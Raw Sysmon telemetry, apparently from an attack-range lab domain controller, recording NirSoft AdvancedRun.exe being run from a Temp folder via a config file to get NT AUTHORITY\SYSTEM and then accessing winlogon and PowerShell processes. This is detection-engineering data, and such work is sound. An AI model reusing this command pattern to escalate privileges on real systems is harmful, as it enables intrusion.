CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080546Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080545Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.506{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.504{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.502{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000004080542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.500{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000004080541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.498{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.498{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.497{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft 
Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080538Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.496{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080537Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.495{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080536Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.490{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 
734700x80000000000000004080535Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.490{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080534Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.489{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080533Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.489{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080532Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 
(rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080531Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080530Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidNT AUTHORITY\SYSTEM 10341000x80000000000000004080529Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.476{834264DD-DAE4-61EA-0500-000000002702}420436C:\Windows\system32\csrss.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000004080528Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.475{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\seclogon.dll+17dc|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 154100x80000000000000004080527Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.476{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /SpecialRunSystem 41a9d8 4792C:\Windows\system32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator 
10341000x80000000000000004080526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080525Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080524Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080523Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A108-000000002702}368C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080522Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A008-000000002702}5124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080521Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9808-000000002702}5860C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080520Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.471{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080519Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080518Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
